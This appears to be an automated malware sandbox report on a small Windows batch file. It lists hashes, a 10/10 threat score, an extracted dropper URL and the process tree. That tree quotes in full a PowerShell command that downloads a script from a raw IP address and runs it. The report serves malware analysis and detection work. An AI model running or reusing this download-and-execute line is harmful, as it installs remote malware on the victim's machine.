Analysis
-
max time kernel
109s -
max time network
141s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
08-03-2020 05:10
Static task
static1
Behavioral task
behavioral1
Sample
x1Bvt0gq.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
x1Bvt0gq.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
x1Bvt0gq.bat
-
Size
192B
-
MD5
dd1239e32d4fd55aae544bb15b09ea1f
-
SHA1
d4f32b49384a2337cbed07cfeebfa8e67e0802d4
-
SHA256
715a6a90ff483fa2887f7e1f517e959d18854b52d8f7ed9b2c274e5b54a1c436
-
SHA512
7a37249a47bfd25e8bd8c7c802cacdb5eb822b221e3a884599b49ab8798b0a9faf7ba98f34c14b7e7da39869f1bfcf452e482935ca502d77e829556921502646
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/x1Bvt0gq
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3524 3104 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3524 WerFault.exe Token: SeBackupPrivilege 3524 WerFault.exe Token: SeDebugPrivilege 3524 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe 3524 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\x1Bvt0gq.bat"1⤵PID:2516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/x1Bvt0gq');Invoke-BBSQCBVUS;Start-Sleep -s 10000"2⤵PID:3104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3524